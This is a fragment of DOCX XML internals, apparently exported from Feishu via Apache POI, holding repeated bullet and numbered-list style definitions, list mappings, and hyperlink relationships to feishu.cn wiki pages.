        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23002">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23003">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23004">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23005">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23006">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23007">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23008">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23009">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23010">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23011">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23012">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23013">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23014">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23015">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23016">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23017">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23018">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23019">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23020">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23021">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23022">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23023">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23024">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23025">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23026">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23027">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23028">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23029">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23030">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23031">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23032">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23033">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23034">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23035">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23036">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23037">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23038">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23039">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23040">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23041">
    <w:lvl>
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23042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22996"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="22997"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22998"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="22999"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23000"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23001"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23002"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="23003"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="23004"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="23005"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="23006"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="23007"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23008"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="23009"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="23010"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="23011"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="23012"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="23013"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="23014"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="23015"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="23016"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="23017"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="23018"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="23019"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="23020"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="23021"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="23022"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="23023"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="23024"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="23025"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="23026"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23027"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="23028"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="23029"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="23030"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="23031"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="23032"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="23033"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="23034"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="23035"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="23036"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="23037"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="23038"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="23039"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="23040"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="23041"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="2304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4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cqbk0n8o1h.feishu.cn/wiki/WoPgw633diLa4HkAndxcljeenCe" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId5" Target="https://cqbk0n8o1h.feishu.cn/wiki/CM9Tw7cZbiZm7ekQzIIc599Xnqd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2024-05-28T14:48:54Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>